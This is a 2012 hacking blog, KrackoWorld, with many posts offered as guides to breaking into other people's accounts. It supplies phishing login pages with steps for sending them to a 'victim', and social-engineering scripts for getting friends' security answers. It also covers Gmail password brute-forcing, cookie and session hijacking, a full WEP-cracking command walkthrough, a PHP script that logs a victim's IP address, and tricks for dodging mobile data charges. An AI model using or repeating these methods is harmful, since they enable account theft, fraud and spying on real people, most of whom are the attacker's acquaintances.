Now you all can invite me on skype for any kind of help required as my username is krackoworld

28 January 2012

Is Facebook Timeline gets Hacked in near by Future! Know why?

Hack Facebook TimelineIf you would ask that above question from me, it will be definitely Yes. Recently Facebook has launched its new feature which was known as FB Timeline. According to Mark Zuckerberg, Timeline means History/story of that person from the beginning and that’s what Facebook Timeline wants to show. Its really seems to be a cool feature but the only problem is that once we switched to Facebook Timeline we can’t be reverted back to our old profile onwards. Facebook Timeline looks to be great and has some awesome features/tools which was never before.
As you know my dear friends gaining popularity also comes with its hacks. Thus, Black hat hackers are now concentrating on Facebook Timeline hacks and cracks. Some days past Anonymous hackers gives an warning to the Facebook CEO about the Timeline vulnerability. In my point of view, this war will never ends as with the increase/development in Cyber security…Hackers should also be increased with new exploits and hacking ideas in coming future. Therefore all you have to be aware of it and sets your mind to tackle it wisely. Anyways KrackoWorld is there to help you out in any of your problem and keep smiling!!!

Some Hacking facts n figures about Facebook Timeline are:

1. Now its much more easy for the hackers to hack Facebook and any other social networking accounts because they usually first gain some useful information about the user which he wants to hack and that information will be easily available at Timeline from the beginning. As in Laymen's language, Facebook Timeline will also be known as Footprinting.

2. With the development of Facebook Timeline, Google plus project of overtaking Facebook sooner will also be crushed.

3. Onwards 6 December 2011 (Facebook Timeline official launching date), more than 1 million people switched to it earlier in just 2 months approximate.

Know what Mark Zuckerberg has to say about Facebook Timeline:

I founded Facebook on the idea that people want to share and connect with people in their lives, but to do this everyone needs complete control over who they share with at all times.
This idea has been the core of Facebook since day one. When I built the first version of Facebook, almost nobody I knew wanted a public page on the internet. That seemed scary. But as long as they could make their page private, they felt safe sharing with their friends online. Control was key. With Facebook, for the first time, people had the tools they needed to do this. That's how Facebook became the world's biggest community online.  We made it easy for people to feel comfortable sharing things about their real lives.
We've added many new tools since then: sharing photos, creating groups, commenting on and liking your friends' posts and recently even listening to music or watching videos together. With each new tool, we've added new privacy controls to ensure that you continue to have complete control over who sees everything you share. Because of these tools and controls, most people share many more things today than they did a few years ago.
Overall, I think we have a good history of providing transparency and control over who can see your information.
That said, I'm the first to admit that we've made a bunch of mistakes. In particular, I think that a small number of high profile mistakes, like Beacon four years ago and poor execution as we transitioned our privacy model two years ago, have often overshadowed much of the good work we've done.

Just have an look at Facebook Timeline:

That’s all for today! New Facebook Timeline Hacks will be on its way sooner..

See also- Hack Facebook accounts for free- All possible ways

27 January 2012

Download Yahoo and Hotmail Phishing Pages

Phishing pagesAfter sharing all the popular phishing/fake login pages at KrackoWorld, now its time to provide you some left over phishers of Yahoo and Hotmail. As you now my friends, these are the companies comes after Gmail and now a days hackers are most concentrating on it. Hotmail is a Email solution provider product of Windows Live (Microsoft) and Ymail is of Yahoo Inc. etc. According to Alexa, Yahoo is at #4 rankings in the world. Therefore to hack Yahoo/Hotmail email accounts with passwords, you have to download the given phishers and follow a below post on how to use phishers to hack anybody's email account very easily.

Get Hotmail and Yahoo Phishers/Fake login Pages:

1. For Hotmail phishing page, click here.

2. For Yahoo or Ymail phishing page, then click here.

After downloading and extracting these files in a separate folder, follow this post to know how to use these phishers to hack email accounts in real world entities. Enjoy!

See also- To know more that how to make these phishing pages of any site, then please click here.

That’s it!

25 January 2012

Free YouTube Video Downloader 2012-Ultra fast and 100% Working

youtube video downloadingLast month I am getting couple of requests that how to download YouTube videos for free without getting stuck or error happening. Therefore, I decided to write an complete post on it with the help of a smart YouTube Downloader 3.3. This software has one of the most downloads in and rated 5/5 by the editors.

Free YouTube Downloader lets you easily download videos from YouTube and convert them to viewable video formats for your desktop, tablet, or other mobile device. It supports output to AVI, WMV, MPEG, DIVX, MP3, MP4. PSP, MOV, FLV and many more formats. If you want the ability to save and view YouTube videos while offline, this is the best tool to use.

How it works?

1. Download and install the YouTube Downloader from here.

YouTube Downloader 3.3

2. Then visit and select your video (copy url) to download in your pc.

3. Now paste the copied url into free YouTube downloader box given to you.

YouTube software

4. Hence choose your preferred output format and video quality, then click Download button properly. That's it. You can even save in high definition (720p or 1080p).

What's new in its latest version?

Free YouTube video downloader now supports downloading for short URLs also.

Some Facts and Figures:

Last year, this software gets around 10,785,985 downloads on an average from cnet. This is truly awesome and see how people are liking it.

Size and Specification:

  • Version: 3.3.120
  • File size: 150K
  • Price: Free
  • Operating system: Windows Me/2000/XP/2003/Vista/7

    All Done! Happy downloading and feel free to ask any query below.

  • 24 January 2012

    Hack WordPress blogs easily- WPScan

    Now a days WordPress hacking is becoming common and common over 2011-12. I have also mentioned some 12 useful ways to secure our WordPress blogs in effective way in my previous post. Therefore today, we will learn how to scan any WordPress blogs with WPScan which means WordPress Security Scanner to hack websites easily. First of all I would like to clear some things about WPScan. Well! WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach written in ruby language, sponsored by RandomStorm and hosted by Googlecode. It provides you an easy way to penetrate wordpress blogs using blackbox techniques and methods.

    What WPScan will provide you for your hacking?

    • List of plugins
    • Name of theme
    • Weak password cracking (multithreaded)
    • Brute force username
    • Directory listings
    • Version details
    • Possible vulnerabilities etc..

    How to install WPScan?


    Please download the latest version of WPScan from our Subversion (SVN) code repository by issuing the following command:

    svn checkout ./wpscan


    16 January 2012

    Find Ethical Hackers Jobs Online

    Certified Ethical HackerNow a days there are many available jobs for the Ethical Hackers because to increase in the demand of them. But they need a CEH which means Certified Ethical hacker only for good monthly salaries. CEH is a computer certification that indicates proficiency in network security, especially in thwarting malicious hacker attacks through preemptive countermeasures. The Certified Ethical Hacker credential is sponsored by EC-Council. You can take your CEH Certificate by many online companies by just passing an simple test consisting of Network Security, Penetrator, Email id hacking, Web hacking techniques, Wireless and Windows hacking, Programming, Password Cracking methods, Malware, Hackers Hierarchy, Computer Expert, Linux Basics and other resources related to Ethical Hacking. According to me, CEH is a first step against the control of Bad hackers.

    How to Pass CEH Test?

    Well! Now you are aware of the above topics required to pass the CEH test. Hence, you need an source, So I recommend you to buy my eBook on Power of Hacking and start your journey now. My eBook contains all that topic and the best thing is that is in very simple language thus makes easy to learn and understand and you will get also my support as well.

    Online available Hacker Jobs for both Normal Hackers and CEH-





    5. You can also find many other online jobs by just Googling the Google search engine by yourself.

    6. To get more part time jobs online, make your own Freelancer or Elance account, mention your profession with your best skills level (resume) and get offers/jobs from other people in short period of time. Check out my Elance Profile.

    That’s it! Have a great Career.

    What is Social Engineering?

    Social engineeringIn simple words, Social Engineering is an art of stealing someone's personal information and data in legal way. Hence, it means to know the person's security question answers by just querying him as usually. Always keep in mind that your victim should not be aware of this and only perform this attack when your victim is a good friend of you properly. This attack is now a days very famous and generally tried by newbie hackers. So therefore I decided to write a brief post on it.

    What to Gain before doing this attack-

    All you have to gain trust or be in a good relation with your victims.

    How to perform this attack?

    Before doing this attack, simply check your victims security question and other information by just going to his/her any registered account for ex- Facebook and now click on forgot password, then enter his/her email id and click submit. Now the next page is about your victims password retrieving methods like by security question, primary email address, mobile verification etc..Hence After that, follow the below steps carefully.

    1. First of all simply chat with your friend (victim) as usual.

    2. Now in the talk, simply refer to him about security question answer. for ex- if its security question is what is your library card number?, then just say that can I issue little bit books from your library card no. as my one is stolen. If he/she says yes, then just ask library card no. and say thank you to it.

    3. Now once you get its security question answer, simply input it at forgotten password and reset it with your once.

    That’s it! Enjoy….

    15 January 2012

    Hack 3G Internet

    3G Hack for all TelecomsNow a days 3G has become our demand/standard and we don’t want to surf 2G anymore for its slow speed. But the only problem is that the 3G plans is too much of costly for all operators, for ex- 3 GB at RS 800, 50 MB at Rs 20 etc. Therefore we need an hack or trick by which we can access 3G at 2G plans. If so then you need not to worry as KrackoWorld is started sharing some of the cool 3G hacks 2011-12 for the companies like Airtel, DoCoMo, Reliance, Vodafone, BSNL, Aircel, Idea and many more given below-

    Top 6 3G hacks for all time!

    1. Reliance 3G Speed Hack 2011- 100% Working

    2. Airtel 3G Hacked 2011 - Proxy Tricks

    3. Hack 3G in Tata DoCoMo and Access free Internet

    4. Hack 3G in Vodafone

    5. How to Hack Idea and Aircel 3G

    6. Hack 3G in BSNL Operator

    That’s it! More 3G Hacks will be on its way!

    Note- It is not mandatory that above 3G hacks would work lifetime for you or in every state. Some of them gets fixed after some interval of time. So don’t blame me too much…

    14 January 2012

    Get Hot Coupons, Discounts and Online Deals

    Now a days finding online coupons/vouchers and deals for heavy discounts at shopping websites like Amazon, eBay, Go Daddy and many more is very much difficult. Hence coupon codes makes our purchase simpler and cheaper than any other. for ex- Amazon after Christmas sale. Therefore, I have founded an online site named as DEALIO who provides this services. Its CEO Mike Effle and other people behind Vendio Services, Inc. has bought up this company in Aug 2005. This site contains all the required Coupons, Vouchers and Deals for any company. You can also have the opportunity to submit your coupons by telling them and get traffic. Generally coupon codes are published with the author name and people have the option to Thumbs Up or Down the coupon. This lead to the increase in the level of the coupon and get more marks as well. You can also comment and share the coupon as per your choice.

    Another good quality of this site is that they also provides the platform of online deals with hunting tools such as Holiday deals etc. So if you take my advice, then please visit this site and took the advantage of cool coupons and discounts. Note- This company is an Award winning Company in coupons and deals from All Top and gets media coverage also from Mashable and CNN Money.

    Other Social media links:

    Find Dealio at Facebook-

    Subscribe Us at here-

    That’s it! I hope all you will enjoy this website very much.

    13 January 2012

    Learn How to Hack Google plus account

    hack google plus accountThere's nothing much more interesting than Hacking Google plus account password because it new and attractive. When Google plus opens for a demo, some people are posting their hacks for unlimited invites but now there is no such issue remains. As per today, Google plus has around 100 million users on it and ranked #1 at Alexa. The war between Facebook and Google plus has arrived. Therefore today, we will learn How to hack it in simple ways :

    Very Important to read : As I am always saying that Gmail and Google plus account are not different from each other as both are the property of Google. Hence to login into Google plus, You will be require to enter the password of your Gmail account. In simple words, If you hacked someone's Gmail account password, his/her Google plus account is also gets hacked away.

    Hack Google plus Password – Procedure

    To hack or want to know more about hacking someone's Google+ accounts, then please read my beautiful post on How to hack Gmail accounts.

    See also- Hack Google plus via Phishing.

    Enjoy hacking and don’t forgot to add me in your Circles.

    How to Hack a Gmail Password- 100% Working Methods

    hack gmail account passwordHacking Gmail is not as easy but logical. As you know it is the vast email provider company ever in this world. Gmail has around 300 million users on it and increasing very fast. Therefore today, we will recall its all hacks and cracks written at KrackoWorld till now. Note-at the end of this post, I will also discuss some of its countermeasures. All you have to read and understand the below posts carefully.

    How to Hack Gmail Account Password- Top 8 ways

    1. Hack Gmail Accounts via Phishing Attacks

    2. Hack Gmail Usernames and passwords via Keylogging

    3. Hack Gmail email id Via Remote Keylogger

    4. Gmail Cookie Stealing Technique–Session Hijacking

    5. All Gmail Hacks, Tips and Tricks

    6. Now you can also purchase My eBook on Power of Hacking for learning these real ways of Hacking and Computer Security

    7. Gmail Cracker

    8. Gmail Password Cracking method through Brute force and Dictionary attacks- New one!

    You can crack and get Gmail passwords through this method. Hence this attacks are much better than Guessing a password randomly for hacking someone email id. First let me explain, Dictionary attacks uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (from a pre-arranged list of values). In contrast with a brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words. Therefore, to perform this attack we will use Gmail BruteMonkey software. This software includes features like Built-In proxy support, Fast processing speed, List of passwords included, Resume at paused password in list etc. Now follow the below procedure to perform this attack wisely :

    1. First of all Download Gmail BruteMonkey at here.
    2. Extract all the files in a separate folder.
    3. Hence open Gmail BruteMonkey.exe properly and then enter your victims username or email id.
    4. All done! Now click on the start button and the process will run automatically.

    Note- 1. It is not guaranteed that your victims password is found by this software because it is based on the dictionary words and letters.
    2. Before, trying this software please disable your antivirus and Windows firewall as well.
    3. Do not try to misuse this software and hack anyone's account for fun.

    Countermeasures :

    1. Always believe in HTTPs encryption.
    2. While sitting in Cafes, office, friends computer always first check whether any keylogger is installed or not.
    3. Do not visit any fake link that will tell you to click.
    4. Always make strong passwords consist of words, letters, Special symbols to avoid such Dictionary attacks mainly.
    5. Beware of Social Engineering and regular update your security questions of Gmail.

    See also- What to do after my Gmail account hacked.

    That’s it!

    12 January 2012

    Hack Facebook Password Free

    hack facebook password for freeHow to hack Facebook password, How to hack Facebook accounts, Hack Facebook account, How to hack Facebook login, Hack Facebook Profile and pics, Hacking Facebook Software's ………That’s it and That’s it! I know that all of you are wondering and searching these keywords on Google search engine to hack Facebook mainly. But the fact is that there are only few methods by which we can hack Facebook accounts not any software or whatever thing will make you Facebook hacking possible. Therefore, below is my best collection of 2011-2012 of Facebook Hacking describing original ways and techniques.

    Top 10 Collection of Facebook Password Hacking- KrackoWorld 2011-12

    1. How to Hack Facebook Accounts - All Possible Ways

    2. Top 10 Best Facebook Hacks 2010-2011

    3. Hack Facebook Via Remote Keylogger

    4. Hack Facebook logins via Phishing Attacks

    5. Hack Facebook Accounts Via FB Trusted Friends Password Recovery Feature

    6. Hack Facebook on Wi-Fi Using Firesheep

    7. Hack anyone Facebook Accounts with Sniperspy- Best Keylogging Software 2011

    8. True Facts and Figures about Facebook Password Hacker and Crackers

    9. Facebook Friend Adder Pro

    10. At last but not the least My Power of Hacking eBook


    If you have learnt all the above hacks and cracks by heart, then you gonna rock with world and do everything what you want to do with Facebook. Develop your own exploit and viruses to amaze people. Also note- By learning these hacks, you are agreeing to KrackoWorld’s Disclaimer.

    To stay updated with this types of post, then subscribe to us here and Please pass the Comments below….

    11 January 2012

    Hack LinkedIn Account Passwords

    Hack linkedinLinkedIn is an Business related social networking site which was launched in May 2003 by Jeff Weiner. This website has over 250 million registered users in more than 190 countries and territories. Its global Alexa rank is 15 and gets over 33 million unique visitors per month also. According to them, their site is a networking tool to find connections to recommended job candidates, industry experts and business partners. Allows registered users to maintain a list of contact details of people they know and trust in business. If I suggest a name after Facebook, Twitter and Google+ then its LinkedIn. Hacking LinkedIn is as same as other Social media site, all you have to know some of the popular methods used for Hacking/Cracking of accounts and passwords like Phishing attack, Keylogging, Password Cracking methods etc. Day by day, Hackers are increasing and thinking over that how to discover new exploits and bugs to LinkedIn. Therefore, Here are the couple of methods below used for hacking LinkedIn Accounts mainly.

    Top 5 Widely used Methods for hacking LinkedIn Accounts :

    1. Phishing Attacks- Well! I am telling again and again that When it comes to Account hacking, Phishing attacks are the best and easiest way to do it. In simple words, this attack is evergreen and no one fix's it. Let me clear you what is it? Phishing attack means the art of dragging someone into a well or something else. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, Facebook or anyone else. The victim is fooled to believe that the fake page is the the real one and enter his/her password. At once the user attempts to login through these pages, his/her account login information are stolen away and stored in a text file.

    How to do it?

    1. First of all download LinkedIn Phisher at here.
    2. Now extract all files and upload them to any web hosting site like, etc..
    3. Once you uploaded that, now send the url of index.html file to your friend or victim and ask them to login/try it.
    4. When he/she goes through it, all his/her login information are stolen way and stored in a text file at your web hosting site like passwords.txt
    5. All Done! Now do what you want to do with his/her account.

    2. Keylogging- Keylogging is one of the easiest method to hack someone accounts with the help of keyloggers like sniper-spy, winspy and many more. All you have to install that keylogger physically or remotely into your victims computer. Now when the person is going to open his/her account in any website, its usernames, passwords and all keystrokes type by him will be stored by the keylogger and we get all the information that we needed to hack his/her account. To Know more about it and popular Keylogger known as Sniperspy, please click here.

    3. Password Cracking Methods- This method includes cracking of their accounts passwords with the help of popular tools like John the Ripper, Brutus, Rainbow tables etc. Actually we crack passwords by trying every word from dictionary known as Dictionary attack by some tools like Brutus. Rainbow tables can also be used to crack lengthy and difficult passwords which based on the criteria on smashing hashes. To know more about it and how to perform this attack, then please click here.

    4. Cookie Stealing techniques- Cookies are used to store all the necessary Information about one’s account, by using this information out you can easily hack anybody’s account by going through it. To take your victims cookie without its permission you have to take help from some software's like cookielogger, Wireshark and add-on’s also like greasemonkey. This attack is little bit harder to perform because sometimes the user is on HTTPs server. To know more about it, Please visit Here.

    Also See- 1. Tutorial on Hacking/Capturing Gmail Cookies and token code.
    2. Video on Hacking Yahoo Cookies

    5. Social Engineering- This sounds very good, but I guess majority of people didn’t aware of it. For newbies, social engineering is method of retrieving password or the answer of security question simply by querying him (your victim). You have to be very careful while using this method as victim must not be aware of your intention. Just ask him cautiously using your logic and way.

    6. Primary Email Address hack- Primary Email Address hack means that you have hacked his Gmail account login information and now you gonna reset his password by telling LinkedIn that you have forgotten your password. Hence LinkedIn will send the user password to his Gmail email ID which you have already hacked it, once you received that email, reset it with your new password and enjoy hacking of your victims LinkedIn account. In this case, I am assuming that the persons primary Email ID is on Gmail.

    That’s it!

    09 January 2012

    How to Hack Idea and Aircel 3G

    Well After sharing all other companies 3G Hacks like Airtel, Vodafone, BSNL, Reliance, Tata DoCoMo in my previous post, today I going to tell you the 2 let one Companies 3G Hack i.e Aircel and Idea. Note- These 3G hacks are not mandatory for every state to work, all you have to test it and if runned successful then enjoy it!

    Procedure for Idea :

    1. First of all install Idea Modded Opera Mini from here.
    2. Then set the Mobile default browsing as

    3. Done! Now enjoy surfing data and note that to keep your balance below Rs 1.

    Procedure for Aircel :

    Its procedure is very much simple. All you have to activate an 2g plan, then connect your mobile to your pc, once connected via 2g signals, then surf internet for 2 mins and then change your 2g signals to 3g signals to going to menu-settings-phone-Network Mode (Now change GSM to UMTS properly). All Done! Note- Do not first connect your computer with UMTS only, otherwise your balance will be deducted.

    Enjoy 3G surfing and Downloading. Hence,3G Mobile Hacks chapter completes over here.

    Make Backup for your Facebook Account and Blogger as Well

    backup-facebook-dataDay by Day due to increase in Hacking/Cracking of email accounts specially Blogger and spreading of viruses/worms in your Facebook Account, its being a headache in our minds that how to save from it. I have written many posts on these Security Tips and tricks, but as you know Backup is must. Therefore, today we will learn that how to make Backup data of these accounts properly. So just follow the below procedure and be safe if your account hacked further.

    Procedure for Facebook :

    1. First of all login into your Facebook account and then click account settings under ▼ tab.

    2. Then at the bottom, you will find Download your copy of Facebook data.

    3. Click it, and enter your Facebook account password in the box provided to you.

    4. Now you will see something like that below-

    Backup Facebook Data

    5. Now click on Download Achieve and wait for 1 hour for the Facebook backup data file to be sent to your Email account.

    6. Note- In the meantime (1 hour), Facebook will prepare your all data from the first time when you sign up at Facebook.

    7. Once you will be emailed with your Backup data from Facebook, click on the link provided in your mail and download it and place at some safe place or upload it in your own Directory.

    8. Done!

    Procedure for Blogger :

    1. First of all login into your Blogger Dashboard and click on Settings.

    2. Now under the basics tab, you will find Export option (Blog Tools), just click on it.

    3. Now you will see something like that below-

    export blog

    4. Now click on Download Blog button and the file will be automatically downloaded to your computer by taking some time.

    5. Place that file (HTML File) in a safe place for longtime and remember to download this file again to update Backup data file when you have written more posts in your Blog after some time.

    If I am Hacked, What to do now with backup Data file?

    1. For Facebook, create a new account with your same name, date of birth and other such information as on the previous hacked account and then upload your backup data file on Facebook. Note- Backup data file will contain all your updates, pics, videos, comments and other personal information.

    2. For Blogger, import that HTML file to a new Blogger account by going to settings and you will get all your posts again. Enjoy!

    That’s it!

    07 January 2012

    Yet Another Blog Launched

    Update:- This Blog has been Changed to Blogging Ways.

    Learn Blogger picsWow! After the success of krackoWorld from the support of you people and my worthy God, at 5 Jan 2012 I have opened a new Blog on “Learn Blogger”. Its name was given as and hosted on Blogger. This name was quite short, easy to pronounce and also search engine friendly. It consists information related to Blogging, SEO, WordPress, Social media, Computer/Mobile Tips and Tricks, How to make money online from experts. Hence, it is a Technology blog and created on the moto of telling the secrets of Blogging, Social media and Technology to you people properly. Now as you know I have my 2 websites to maintain on, therefore it is very difficult for me write regularly on KrackoWorld. I write articles on both of the blogs but one by one. So my request is to make my another Blog/Website healthy-wealthy with lots of enjoyable comments from you people like this one. Enjoy! and stay tuned to Learn Blogger also for more exciting stuffs related to Tech-Blogging and its resources.

    03 January 2012

    Hack Google Plus via Phishing

    As you all know that to challenge Facebook, Google has launched its Google plus which includes all features like FB but with some twist or unique style. Now a days, Google + is spreading very fast like a worm because of its fast loading and some other functions. Hence, in this post we are going to learn that How to Hack Google Plus via Phishing attack. Enjoy!


    You are wondering that I am going to present a phishing page of Google + among you as I do earlier. But the fact is that we don’t require it. Why? Because all we have to hack Gmail account and if we did it- Google plus is also hacked.

    Note- Google Plus is a Google authority and if we have an Gmail account earlier- we are not going to register again with Google plus as Google plus takes the account information of Gmail account etc..

    So to download Gmail fake login Page, Please Click here and if you wanted to make own Google + phishing page, then click here to learn more about it.

    And to know what a phishing attack is or how to perform this attack by fake login page, then plz click here.

    Thanks! More vulnerabilities of Google + will be coming soon…

    02 January 2012

    Footprinting and Port Scanning- Overview

    FootprintingFootprinting is the technique of gathering some information about the computer systems and the entities they belong to. This can be done by employing various computer security techniques such as network/DNS queries, port scanning, OS identification, ping services, WWW spiders and WHOIS information etc.. Some of the widely used tools for footprinting are Telnet, NslookUp, Ping, Tracert, Netstat etc. For more information about that tools, please click here.

    Steps needed to do it-

    1. First the hacker will start collecting information about the targeting domain which includes IP address, Registry information, website owner and contact information etc. through WHOIS tools.

    2. Next the hacker would Ping the server to see if it is up and running because it is difficult to hack the offline server. For ex-, are the websites which pings a website server from different locations of the world.

    3. Now the hacker would search its pages and directory via Google search engine for some security loopholes.

    Port Scanning

    Do you know friends that Port scanning is usually do to find and search open and closed ports of a website. Thus, if a hacker finds any open port, he/she would start looking for vulnerabilities and exploit them to control the website. For ex- Nmap is one of the popular software’s in port scanning and available for both windows and MAC users. You can download it from .

    After installing it, type your victims website in the target section, hit Intense scan and type command as-

    nmap -T Aggressive -A -v and then scan for all the ports.

    For ex- You will find open port like this- 80/tcp on . Now once you have founded open ports, just exploit them. Hence to do this, Banner Grabbing comes into play. Banner grabbing is a technique or attack used by a hacker which will tell the hacker what type of operating system an application is running under and the version of the operating system installed. We will learn more about it in upcoming posts. So stay tuned.


    Learn How to Close open ports for safety !
    Choose Start -> Settings -> Control Panel -> Administrative Tools. Select Services. Scroll down in the list until you see the name of the service you want to close. Select it, change the start-up type to "Disabled," and click "Stop" to stop the service. Try to know what you're doing there, because you could stop services required to keep your machine running.


    PS: Now you can ask your off-topic question at KrackoWorld’s My Forums-

    01 January 2012

    Cracking WEP- Wireless Hacking

    WEP stands for Wired Equivalent Privacy (WEP)- It is a weak security algorithm for the wireless networks because its name implies that it is as secure as a wired connection. It should be cracked easily with the help of some tools which I gonna discuss below. Many Flaws has been discovered also by the hackers to crack its key very safely.

    BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

    BackTrack includes many well known security tools including:

    •Metasploit integration
    •RFMON Injection capable wireless drivers
    •Wireshark (formerly known as Ethereal)
    •BeEF (Browser Exploitation Framework)
    •Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with
    telnet/enable default password.
    •Quypt (Terminal Emulator) (which is private software by Crimson Hacking group,
    which has leaked to the Mainstream) Blackhat.
    •A large collection of exploits as well as more commonplace software such as


    You will need a wireless adapter, a nearby WEP-enabled Wi-Fi network and a Live CD
    with BackTrack to perform this attack.


    To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's
    right there on the taskbar in the lower left corner, second button to the right. Now, the

    First run the following to get a list of your network interfaces:


    The only one I've got there is labeled ra0. Yours may be different; take note of the label
    and write it down. From here on in, substitute it in everywhere a command includes

    Now, run the following four commands. See the output that I got for them in the
    screenshot below.

    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)

    demo 1_thumb[1]

    If you don't get the same results from these commands as pictured here, most likely
    your network adapter won't work with this particular crack. If you do, you've
    successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

    Now it's time to pick your network. Run:

    airodump-ng (interface)

    To see a list of wireless networks around you. When you see the one you want, hit
    Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take
    note of two things: its BSSID and its channel (in the column labeled CH), as pictured
    below. Obviously the network you want to crack should have WEP encryption (in the
    ENC) column, not WPA or anything else.

    demo 2_thumb[2]

    Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the
    network I was looking for.) Once you've got it, highlight the BSSID and copy it to your
    clipboard for reuse in the upcoming commands.

    Now we're going to watch what's going on with that network you chose and capture
    that information to a file. Run:

    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

    Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to
    clipboard. You can use the Shift+Insert key combination to paste it into the command.
    Enter anything descriptive for (file name). I chose "yoyo," which is the network's name
    I'm cracking.

    You'll get output like what's in the window in the background pictured below. Leave
    that one be. Open a new Konsole window in the foreground, and enter this command:
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    Here the ESSID is the access point's SSID name, which in my case is yoyo. What you
    want to get after this command is the reassuring "Association successful" message with
    that smiley face.

    You're almost there. Now it's time for:

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

    Here we're creating router traffic to capture more throughput faster to speed up our
    crack. After a few minutes, that front window will start going crazy with read/write
    packets. (Also, I was unable to surf the web with the yoyo network on a separate
    computer while this was going on.) Here's the part where you might have to grab
    yourself a cup of coffee or take a walk. Basically you want to wait until enough data has
    been collected to run your crack. Watch the number in the "#Data" column—you want
    it to go above 10,000. (Pictured below it's only at 854.)
    Depending on the power of your network (mine is inexplicably low at -32 in that
    screenshot, even though the yoyo AP was in the same room as my adapter), this
    process could take some time. Wait until that #Data goes over 10k, though—because
    the crack won't work if it doesn't. In fact, you may need more than 10k, though that
    seems to be a working threshold for many.

    demo 3_thumb[2]

    Once you've collected enough data, it's the moment of truth. Launch a third Konsole
    window and run the following to crack that data you've collected:

    aircrack-ng -b (bssid) (file name-01.cap)

    Here the filename should be whatever you entered above for (file name). You can
    browse to your Home directory to see it; it's the one with .cap as the extension.

    If you didn't get enough data, aircrack will fail and tell you to try again with more. If it
    succeeds, it will look like this:
    demo 4_thumb[1]

    The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the
    network etc. Enjoy...

    That’s it for today !

    Gmail Cookie Stealing Technique–Session Hijacking

    All of you knows that hacking Gmail is one of the toughest jobs ever on the internet because it is made by Google- one of top Companies in the world. As you knows that cookie stealing and session techniques are the common ways to hack it mainly. Therefore today, we will learn how to gain access to your victims Gmail account by stealing his/her cookies (GX cookies) and tokens that authenticates users.

    Basics of this Attack :

    1. What is a Cookie ?

    Well! A cookie is a piece of code or some language which is used to authenticate a user on a website with his/her pc or laptop.

    2. What is a Token or Session Token ?

    After the authentication is completed , A webserver hands the browser with an session token to recognize different connections with it. If anyone hacks the session token, he/she will completely access his/her account from anywhere.

    After that, the hacker would start injecting the cookies into cookie injector or stealer (an Mozilla Firefox add-on) and gain access to his/her account. This is known as Session Hijacking.

    How to get or capture the cookies of someone :

    1. This method works same as my previous post. All you have to send the harmful php script to your victims and asking him to click by uploading it to free webhosting companies like, etc. Once he/she clicks accidently, all his/her cookies will be stored in a txt file. Note- This is the case when we know the php script of hacking Gmail accounts. If you don’t know, follow the below steps.

    2. To capture GX cookies that means Gmail cookies, we will take help of some popular tools like Cain and Abel, Wireshark, Ettercap etc..

    @ Wireshark :

    Use this tool to capture GX cookies if you are on a hub based network. This is known as packet sniffing method.

    1. First of all download and install wireshark from googling.
    2. Now open it and click analyze and after that interfaces.
    3. Then start the process as wireshark will capture all the local cookies by taking some time.
    4. That’s it! copy one of GX cookie from wireshark in Bytes (Printable Text Only) and inject them into cookie injector.
    5. Once it will done, you have complete access to his/her account.

    @ Cain and Abel :

    Use this tool to capture GX cookies if you are on a LAN based network and windows operating system.

    1. First of download and install Cain and Abel from here.
    2. Now open it and go to the sniffer tab, then http and click start at the top left end.
    3. This will show you all the cookies along with its server.
    4. Done! Enjoy hacking…

    @ Ettercap :


    Use this tool to capture GX cookies if you are on a Linux based machine. For more details, click here. This is known as the Man in the Middle Attack.

    Countermeasures :

    There is only 1 basic countermeasure of it given below- 
    Use https:// encryption instead of http://

    How to do it ?

    Visit your Gmail account, click on settings and under the general tab- you will see Browser connection, change it to Always use https and save it.

    This chapter is over now! Any doubts is welcomed below-

    Learn How to Know or Steal your Victims IP Address

    If you want to hack or crack someone accounts, Knowing your victims IP address will be an important issue to do it. As it is also need in cookie stealing techniques. Therefore, below is a simple php exploit to known your victims IP address by sending to it and saying for clicking or downloading etc..


    1. First of all make an blank txt file in your computer and rename it as get.php

    2. Then open it and paste the below code properly-

    $file = 'IP.txt';
    $handle = fopen($file,'a');
    if(!isset($_GET['p'])) { header('Location:'); }
    fwrite($handle, $_GET['p'].': '.$_SERVER

    3. now save the php file.

    4. Then make another blank file with .txt extension and rename it with IP.txt for storing IP addresses.

    5. Hence, you have now 2 files and start uploading them into free hosting companies like,, etc..

    6. Recommended to upload these 2 files into and then copy the link of get.php file.

    7. Done! now start sharing this link with your friends and ask them to click or download.

    8. When anyone clicks, the IP address of him will get stored into your IP.txt file in account.

    9. Therefore, note his/her IP address and do some hacking whatever you want.


    Enjoy na! If you want to become an pure Ethical hacker and Computer Security Expert like me, please click here to download my new eBook on “Power of Hacking”.

    For subscribing Email updates or rss, click here.


    Recent Posts

    Review this blog on

    Recent Comments

    | KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |